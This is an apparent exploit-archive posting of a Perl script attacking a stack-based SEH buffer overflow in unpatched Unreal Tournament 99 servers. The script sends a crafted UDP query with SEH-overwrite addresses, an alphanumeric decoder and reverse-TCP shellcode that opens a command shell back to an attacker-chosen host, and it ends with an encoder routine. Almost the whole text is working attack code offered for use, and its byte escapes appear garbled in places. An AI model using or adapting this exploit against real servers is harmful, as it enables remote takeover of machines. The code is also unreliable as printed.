Unreal Tournament Buffer Overflow
Posted on 10 February 2011
# Unreal Tournament Remote Buffer Overflow Exploit (SEH) (Windows) # Discovered by: Luigi Auriemma (http://aluigi.altervista.org/adv/unsecure-adv.txt) # Coded By: Fulcrum (08/02/2011) # # Patch: http://www.unrealadmin.org/forums/showthread.php?t=15616 # Vulnerable: all ut99 servers without a patch. # Tested on: win7 64-bit, xp sp3, vista sp2 with ut v400,436,440,451,451b # # Bad characters: 0x00 0x5c # Maximum shellcode size: 938 bytes # # Thanks to: Metasploit, Heretic, Luigi Auriemma, Peter Van Eeckhoutte & Skylined use IO::Socket::INET; # Header die "Usage: unreal_tournament-bof-win.pl <host> <query port> <reverse ip> <reverse port> " unless ($ARGV[3]); # Connect to the server $socket = new IO::Socket::INET(PeerAddr => $ARGV[0],PeerPort => $ARGV[1], Proto => "udp", Timeout => 2) or die; # Convert the reverse ip and port to hex format $reverse_ip_hex = join("", unpack("H*", pack("c*", split(/./, $ARGV[2])))); $reverse_port_hex = unpack("H*", pack("N", $ARGV[3])); # Get the server version $socket->send("\basic\"); $socket->recv($recvmsg, 512, 0); # Create the special packet $packet = "\secure\"; # header if ($recvmsg =~ /gamever\(400|436)/) { $packet .= "x41" x 24; # junk for ut v400,436 } else { $packet .= "x41" x 64; # junk for ut v440,451,451b } $packet .= "xebx06x90x90"; # nseh / short jump to the shellcode if ($recvmsg =~ /gamever\440/) { $packet .= "x61xaex14x10"; # seh / 0x1014AE61 / pop ebx - pop - ret / core.dll v440 } else { $packet .= "x98x53x13x10"; # seh / 0x10135398 / pop esi - pop - retbis / core.dll v400,436,451,451b } $packet .= "x90"; # nop $packet .= "xebx03x59xebx05xe8xf8xffxffxff". "IIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"; # alphanumeric decoder from Skylined (getEIP code taken from Heretic) $packet .= shellcode_encoder( "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52". "x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26". "x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0d". "x01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0". "x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8b". "x58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xff". "x31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7d". "xf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8b". "x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44". "x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8b". "x12xebx86x5dx68x33x32x00x00x68x77x73x32x5f". "x54x68x4cx77x26x07xffxd5xb8x90x01x00x00x29". "xc4x54x50x68x29x80x6bx00xffxd5x50x50x50x50". "x40x50x40x50x68xeax0fxdfxe0xffxd5x89xc7x68". chr(hex(substr($reverse_ip_hex, 0, 2))). # 1st byte of the ip in hex chr(hex(substr($reverse_ip_hex, 2, 2))). # 2nd byte of the ip in hex chr(hex(substr($reverse_ip_hex, 4, 2))). # 3rd byte of the ip in hex chr(hex(substr($reverse_ip_hex, 6, 2))). # 4th byte of the ip in hex "x68x02x00". chr(hex(substr($reverse_port_hex, 4, 2))). # 1st byte of the port in hex chr(hex(substr($reverse_port_hex, 6, 2))). # 2nd byte of the port in hex "x89xe6x6ax10x56". "x57x68x99xa5x74x61xffxd5x68x63x6dx64x00x89". "xe3x57x57x57x31xf6x6ax12x59x56xe2xfdx66xc7". "x44x24x3cx01x01x8dx44x24x10xc6x00x44x54x50". "x56x56x56x46x56x4ex56x56x53x56x68x79xccx3f". "x86xffxd5x89xe0x4ex56x46xffx30x68x08x87x1d". "x60xffxd5xbbxf0xb5xa2x56x68xa6x95xbdx9dxff". "xd5x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72". "x6fx6ax00x53xffxd5"); # reverse tcp shellcode / ruby msfpayload windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 P # Send the special packet $socket->send($packet); # Close the connection to the server $socket->close(); exit; # Alphanumeric encoder function from Skylined (Alpha2) sub shellcode_encoder { local $valid_chars, $shellcoded_encoded, $a, $b, $c, $d, $e, $f, $i, $j; $valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; $shellcoded_encoded = ""; for($i=0; $i<length($_[0]); $i++) { $char = hex(unpack("H*", substr($_[0], $i, 1))); $a = ($char & 0xf0) >> 4; $b = ($char & 0x0f); $f = $b; $j = int(rand(length($valid_chars))); while((hex(unpack("H*", substr($valid_chars, $j, 1))) & 0x0f) != $f) { $j = ++$j % length($valid_chars); } $e = hex(unpack("H*", substr($valid_chars, $j, 1))) >> 4; $d = ($a^$e); $j = int(rand(length($valid_chars))); while((hex(unpack("H*", substr($valid_chars, $j, 1))) & 0x0f) != $d) { $j = ++$j % length($valid_chars); } $c = hex(unpack("H*", substr($valid_chars, $j, 1))) >> 4; $shellcoded_encoded .= chr(($c<<4)+$d); $shellcoded_encoded .= chr(($e<<4)+$f); } $shellcoded_encoded .= "x41"; return $shellcoded_encoded; }
